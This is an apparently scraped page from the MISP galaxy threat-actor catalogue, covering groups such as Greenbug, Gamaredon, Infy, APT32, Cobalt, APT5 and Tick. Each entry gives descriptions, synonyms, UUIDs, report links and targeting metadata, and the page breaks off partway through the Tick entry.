Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.
Internal MISP references
UUID 47204403-34c9-4d25-a006-296a0939d1a2
which can be used as unique global reference for Greenbug
in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/ - webarchive
- https://threatpost.com/shamoon-collaborator-greenbug-adopts-new-communication-tool/125383/ - webarchive
- https://www.clearskysec.com/greenbug/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
targeted-sector | ['Education', 'Energy', 'Investment', 'Aerospace', 'Government, Administration'] |
Related clusters
To see the related clusters, click here.
Gamaredon Group
Unit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have labelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at least 2013. In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group have improved their technical capabilities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gamaredon Group.
Known Synonyms |
---|
ACTINIUM |
Actinium |
Aqua Blizzard |
Blue Otso |
BlueAlpha |
DEV-0157 |
G0047 |
IRON TILDEN |
PRIMITIVE BEAR |
Shuckworm |
Trident Ursa |
UAC-0010 |
Winterflounder |
Internal MISP references
UUID 1a77e156-76bc-43f5-bdd7-bd67f30fbbbb
which can be used as unique global reference for Gamaredon Group
in MISP communities and other software using the MISP galaxy
External references
- http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution - webarchive
- https://www.lookingglasscyber.com/wp-content/uploads/2015/08/Operation_Armageddon_Final.pdf - webarchive
- https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution - webarchive
- https://attack.mitre.org/groups/G0047 - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/tree/master/Russia/APT/Gamaredon - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine - webarchive
- https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations - webarchive
- https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game - webarchive
- https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2019-1212.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/tridentursa - webarchive
- https://cert.gov.ua/article/1229152 - webarchive
- https://cert.gov.ua/article/971405 - webarchive
- https://cert.gov.ua/article/40240 - webarchive
- https://cert.gov.ua/article/39386 - webarchive
- https://cert.gov.ua/article/39086 - webarchive
- https://cert.gov.ua/article/39138 - webarchive
- https://cert.gov.ua/article/18365 - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine', 'Germany'] |
cfr-target-category | ['Government'] |
Related clusters
To see the related clusters, click here.
Infy
Infy is a group of suspected Iranian origin. Since early 2013, we have observed activity from a unique threat actor group, which we began to investigate based on increased activities against human right activists in the beginning of 2015. In line5with other research on the campaign, released prior to publication of this document, we have adopted the name “Infy”, which is based on labels used in the infrastructure and its two families of malware agents. Thanks to information we have been able to collect during the course of our research, such as characteristics of the group’s malware and development cycle, our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state. Amongst a backdrop of other incidents, Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014, growing in use up to the February 2016 parliamentary election in Iran. After the conclusion of the parliamentary election, the rate of attempted intrusions and new compromises through the Infy agent slowed, but did not end. The trends witnessed in reports from recipients are reinforced through telemetry provided by design failures in more recent versions of the Infy malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Infy.
Known Synonyms |
---|
Foudre |
Operation Mermaid |
Prince of Persia |
Internal MISP references
UUID 1671be1b-c844-48f5-84c8-54ac4fe4d71e
which can be used as unique global reference for Infy
in MISP communities and other software using the MISP galaxy
External references
- https://www.intezer.com/prince-of-persia-the-sands-of-foudre/ - webarchive
- https://www.freebuf.com/articles/network/105726.html - webarchive
- https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf - webarchive
- https://iranthreats.github.io/ - webarchive
- http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/ - webarchive
- http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/ - webarchive
- https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/prince-persia - webarchive
- https://unit42.paloaltonetworks.com/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-prince-persia-ride-lightning-infy-returns-foudre/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Iran', 'France', 'China', 'Sweden', 'United States', 'United Kingdom', 'Germany', 'Syria', 'Italy', 'Denmark', 'Canada', 'Russia', 'Saudi Arabia', 'Bahrain'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Activists', 'Civil society'] |
Sima
Sima is a group of suspected Iranian origin targeting Iranians in diaspora. In February 2016, Iran-focused individuals received messages purporting to be from Human RightsWatch's (HRW) Emergencies Director, requesting that they read an article about Iran pressing Afghanr efugees to fight in Syria. While referencing a real report published by HRW, the links provided for the Director’s biography and article directed the recipient to malware hosted elsewhere. These spear-phishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting. Although the messages still had minor grammatical and stylistic errors that would be obvious to a native speaker, the actors demonstrated stronger English-language proficiency than past intrusion sets and a deeper investment in background research prior to the attempt. The actors appropriated a real identity that would be expected to professionally interact with the subject, then offered validation through links to their biography and social media, the former of which itself was malware as well. The bait documents contained a real article relevant to their interests and topic referenced, and the message attempted to address to how it aligned with their professional research or field of employment. The referenced documents sent were malware binaries posing as legitimate files using the common right-to-left filenames tactic in order to conceal the actual file extension. All of these techniques, while common pretexting mechanisms, are a refinement compared to a tendency amongst other groups to simply continually send different forms of generic malware or phishing, in the hopes that one would eventually be successful.
Internal MISP references
UUID 80f9184d-1df3-4ad0-a452-cdb90fe57216
which can be used as unique global reference for Sima
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Blue Termite
Blue Termite is a group of suspected Chinese origin active in Japan.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blue Termite.
Known Synonyms |
---|
Cloudy Omega |
Emdivi |
Internal MISP references
UUID a250af72-f66c-4d02-9f36-ab764ce9fe85
which can be used as unique global reference for Blue Termite
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Japan'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Groundbait
Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk People’s Republics.
Internal MISP references
UUID 8ed5e3f0-ed30-4eb8-bbee-4e221bd76d73
which can be used as unique global reference for Groundbait
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | UA |
targeted-sector | ['Separatists'] |
Longhorn
Longhorn has been active since at least 2011. It has used a range of back door Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally. According to cfr, this threat actor compromises governments, international organizations, academic institutions, and financial, telecommunications, energy, aerospace, information technology, and natural resource industries for espionage purposes. Some of the tools used by this threat actor were released by Wikileaks under the name "Vault 7."
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Longhorn.
Known Synonyms |
---|
APT-C-39 |
Lamberts |
PLATINUM TERMINAL |
the Lamberts |
Internal MISP references
UUID 2f3311cd-8476-4be7-9005-ead920afc781
which can be used as unique global reference for Longhorn
in MISP communities and other software using the MISP galaxy
External references
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/longhorn - webarchive
- http://blogs.360.cn/post/APT-C-39_CIA_EN.html - webarchive
- https://www.secureworks.com/research/threat-profiles/platinum-terminal - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United States |
cfr-suspected-victims | ['Global'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | US |
targeted-sector | ['Telecoms', 'Aerospace', 'Energy', 'Education', 'Government, Administration', 'Finance', 'News - Media'] |
Related clusters
To see the related clusters, click here.
Callisto
The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Callisto.
Known Synonyms |
---|
BlueCharlie |
COLDRIVER |
GOSSAMER BEAR |
SEABORGIUM |
Star Blizzard |
TA446 |
Internal MISP references
UUID fbd279ab-c095-48dc-ba48-4bece3dd5b0f
which can be used as unique global reference for Callisto
in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20170417102235/https://www.f-secure.com/documents/996508/1030745/callisto-group - webarchive
- https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe - webarchive
- https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations - webarchive
- https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://www.darkreading.com/attacks-breaches/russian-apt-bluecharlie-swaps-infrastructure-to-evade-detection - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
targeted-sector | ['Government, Administration', 'Military', 'Think Tanks', 'Journalist'] |
Related clusters
To see the related clusters, click here.
APT32
Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT32.
Known Synonyms |
---|
APT 32 |
APT-32 |
APT-C-00 |
ATK17 |
BISMUTH |
Canvas Cyclone |
Cobalt Kitty |
G0050 |
Ocean Buffalo |
Ocean Lotus |
OceanLotus |
OceanLotus Group |
POND LOACH |
Sea Lotus |
SeaLotus |
TIN WOODLAWN |
Internal MISP references
UUID aa29ae56-e54b-47a2-ad16-d3ab0242d5d7
which can be used as unique global reference for APT32
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0050/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html - webarchive
- https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/ - webarchive
- https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/ - webarchive
- https://www.brighttalk.com/webcast/10703/261205 - webarchive
- https://github.com/eset/malware-research/tree/master/oceanlotus - webarchive
- https://www.cfr.org/interactive/cyber-operations/ocean-lotus - webarchive
- https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware - webarchive
- https://www.secureworks.com/research/threat-profiles/tin-woodlawn - webarchive
- https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ - webarchive
- https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html - webarchive
- https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them - webarchive
- https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Vietnam |
cfr-suspected-victims | ['China', 'Germany', 'United States', 'Vietnam', 'Philippines', 'Association of Southeast Asian Nations'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | VN |
targeted-sector | ['Dissidents', 'Government, Administration', 'Journalist'] |
Related clusters
To see the related clusters, click here.
SilverTerrier
As these tools rise and fall in popularity (and more importantly, as detection rates by antivirus vendors improve), SilverTerrier actors have consistently adopted new malware families and shifted to the latest packing tools available.
Internal MISP references
UUID acbfd9e4-f78c-4ae0-9b52-c35ed679e546
which can be used as unique global reference for SilverTerrier
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | NG |
WildNeutron
A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not-state sponsored, rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies who have publicly acknowledged attacks. Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target. This group operates at a much higher level than the average cybercrime gang. It is not interested in stealing credit card details or customer databases and is instead focused on high-level corporate information. Butterfly may be selling this information to the highest bidder or may be operating as hackers for hire. Stolen information could also be used for insider-trading purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WildNeutron.
Known Synonyms |
---|
Butterfly |
Morpho |
Sphinx Moth |
Internal MISP references
UUID e7df3572-0c96-4968-8e5a-803ef4219762
which can be used as unique global reference for WildNeutron
in MISP communities and other software using the MISP galaxy
External references
- https://www.symantec.com/connect/blogs/butterfly-profiting-high-level-corporate-attacks - webarchive
- https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/ - webarchive
- https://research.kudelskisecurity.com/2015/11/05/sphinx-moth-expanding-our-knowledge-of-the-wild-neutron-morpho-apt/ - webarchive
- https://blog.twitter.com/official/en_us/a/2013/keeping-our-users-secure.html - webarchive
- https://www.facebook.com/notes/facebook-security/protecting-people-on-facebook/10151249208250766 - webarchive
- https://www.reuters.com/article/us-apple-hackers/exclusive-apple-macs-hit-by-hackers-who-targeted-facebook-idUSBRE91I10920130219 - webarchive
- https://blogs.technet.microsoft.com/msrc/2013/02/22/recent-cyberattacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
PLATINUM
PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PLATINUM.
Known Synonyms |
---|
ATK33 |
G0068 |
TwoForOne |
Internal MISP references
UUID 1fc5671f-5757-43bf-8d6d-a9a93b03713a
which can be used as unique global reference for PLATINUM
in MISP communities and other software using the MISP galaxy
External references
- http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf - webarchive
- https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/ - webarchive
- https://attack.mitre.org/groups/G0068/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Defense', 'Government, Administration', 'Diplomacy', 'Intelligence', 'Telecoms'] |
Related clusters
To see the related clusters, click here.
RASPITE
Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE. Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time. RASPITE leverages strategic website compromise to gain initial access to target networks. RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials. The group then deploys install scripts for a malicious service to beacon back to RASPITE-controlled infrastructure, allowing the adversary to remotely access the victim machine.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RASPITE.
Known Synonyms |
---|
LeafMiner |
Raspite |
Internal MISP references
UUID 2c8994ba-367c-46f6-bfb0-390c8760dd9e
which can be used as unique global reference for RASPITE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
since | 2017 |
targeted-sector | ['Electric'] |
victimology | Electric utility sector |
FIN8
FIN8 is a financially motivated group targeting the retail, hospitality and entertainment industries. The actor had previously conducted several tailored spearphishing campaigns using the downloader PUNCHBUGGY and POS malware PUNCHTRACK.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN8.
Known Synonyms |
---|
ATK113 |
G0061 |
Internal MISP references
UUID a78ae9fe-71cd-4563-9213-7b6260bd9a73
which can be used as unique global reference for FIN8
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html - webarchive
- https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html - webarchive
- https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf - webarchive
- https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html - webarchive
- https://attack.mitre.org/groups/G0061 - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Entertainment', 'Hospitality', 'Retail'] |
Related clusters
To see the related clusters, click here.
El Machete
El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here. We’ve found that this group has continued to operate successfully, predominantly in Latin America, since 2014. All attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular El Machete.
Known Synonyms |
---|
APT-C-43 |
G0095 |
Machete |
machete-apt |
Internal MISP references
UUID 827c17e0-c3f5-4ad1-a4f4-30a40ed0a2d3
which can be used as unique global reference for El Machete
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0095/ - webarchive
- https://securelist.com/el-machete/66108/ - webarchive
- https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/machete - webarchive
- https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html - webarchive
- https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Venezuela', 'Russia', 'Cuba', 'China', 'Belgium', 'Ecuador', 'Brazil', 'Spain', 'Germany', 'France', 'Colombia', 'Peru', 'Sweden', 'United States', 'Malaysia'] |
cfr-target-category | ['Military', 'Government'] |
cfr-type-of-incident | Espionage |
Related clusters
To see the related clusters, click here.
Cobalt
A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cobalt.
Known Synonyms |
---|
COBALT SPIDER |
Cobalt Gang |
Cobalt Group |
G0080 |
GOLD KINGSWOOD |
Mule Libra |
Internal MISP references
UUID 01967480-c49b-4d4a-a7fa-aef0eaf535fe
which can be used as unique global reference for Cobalt
in MISP communities and other software using the MISP galaxy
External references
- https://www.helpnetsecurity.com/2016/11/22/cobalt-hackers-synchronized-atm-heists/ - webarchive
- https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-tests-banks-in-russia-and-romania/ - webarchive
- https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-september-cobalt-spider/ - webarchive
- https://www.group-ib.com/blog/cobalt - webarchive
- https://www.reuters.com/article/us-taiwan-cyber-atms/taiwan-atm-heist-linked-to-european-hacking-spree-security-firm-idUSKBN14P0CX - webarchive
- https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/ - webarchive
- https://www.riskiq.com/blog/labs/cobalt-strike/ - webarchive
- https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/ - webarchive
- https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain - webarchive
- https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested - webarchive
- https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf - webarchive
- https://attack.mitre.org/groups/G0080/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://unit42.paloaltonetworks.com/atoms/mulelibra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
TA459
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA459.
Known Synonyms |
---|
G0062 |
Internal MISP references
UUID c6472ae1-c6ad-4cf1-8d6e-8c94b94fe314
which can be used as unique global reference for TA459
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Related clusters
To see the related clusters, click here.
Cyber Berkut
Internal MISP references
UUID 4d9f68ba-cb2b-40bf-ba4b-6a5a9f2e1cf8
which can be used as unique global reference for Cyber Berkut
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
Tonto Team
Tonto Team is a Chinese-speaking APT group that has been active since at least 2013. They primarily target military, diplomatic, and infrastructure organizations in Asia and Eastern Europe. The group has been observed using various malware, including the Bisonal RAT and ShadowPad. They employ spear-phishing emails with malicious attachments as their preferred method of distribution.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tonto Team.
Known Synonyms |
---|
BRONZE HUNTLEY |
COPPER |
CactusPete |
Earth Akhlut |
G0131 |
KARMA PANDA |
PLA Unit 65017 |
Red Beifang |
TAG-74 |
Internal MISP references
UUID 0ab7c8de-fc23-4793-99aa-7ee336199e26
which can be used as unique global reference for Tonto Team
in MISP communities and other software using the MISP galaxy
External references
- https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/ - webarchive
- https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf - webarchive
- https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/ - webarchive
- https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403 - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html - webarchive
- https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf - webarchive
- https://www.recordedfuture.com/multi-year-chinese-apt-campaign-targets-south-korean-academic-government-political-entities - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Eastern Europe', 'Japan', 'South Korea', 'Taiwan', 'US'] |
cfr-target-category | ['Military', 'Government', 'Private sector'] |
country | CN |
Danti
Internal MISP references
UUID fb745fe1-5478-4d47-ad3d-7389fa4a6f77
which can be used as unique global reference for Danti
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT5
We have observed one APT group, which we call APT5, particularly focused on telecommunications and technology companies. More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors. Several times, APT5 has targeted organizations and personnel based in Southeast Asia. APT5 has been active since at least 2007. It appears to be a large threat group that consists of several subgroups, often with distinct tactics and infrastructure. APT5 has targeted or breached organizations across multiple industries, but its focus appears to be on telecommunications and technology companies, especially information about satellite communications. APT5 targeted the network of an electronics firm that sells products for both industrial and military applications. The group subsequently stole communications related to the firm’s business relationship with a national military, including inventories and memoranda about specific products they provided. In one case in late 2014, APT5 breached the network of an international telecommunications company. The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company’s relationships with other telecommunications companies
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT5.
Known Synonyms |
---|
BRONZE FLEETWOOD |
KEYHOLE PANDA |
MANGANESE |
Mulberry Typhoon |
Poisoned Flight |
TEMP.Bottle |
Internal MISP references
UUID a47b79ae-7a0c-4308-9efc-294af19cc795
which can be used as unique global reference for APT5
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/current-threats/apt-groups.html - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-fleetwood - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Electronic', 'Telecoms', 'Technology'] |
Related clusters
To see the related clusters, click here.
Tick
Tick is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group appears to have close ties to the Chinese National University of Defense and Technology, which is possibly linked to the PLA. This threat actor targets organizations in the critical infrastructure, heavy industry, manufacturing, and international relations sectors for espionage purposes. The attacks appear to be centered on political, media, and engineering sectors. STALKER PANDA has been observed conducting targeted attacks against Japan, Taiwan, Hong Kong, and the United States.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tick.
Known Synonyms |
---|
BRONZE BUTLER |
G0060 |
Nian |
PLA Unit 61419 |
REDBALDKNIGHT |
STALKER PANDA |
Stalker Taurus |
Internal MISP references
UUID add6554a-815a-4ac3-9b22-9337b9661ab8
which can be used as unique global reference for Tick
in MISP communities and other software using the MISP galaxy
External references
- https://wikileaks.org/vault7/document/2015-08-20150814-256-CSIR-15005-Stalker-Panda/2015-08-20150814-256-CSIR-15005-Stalker-Panda.pdf - webarchive
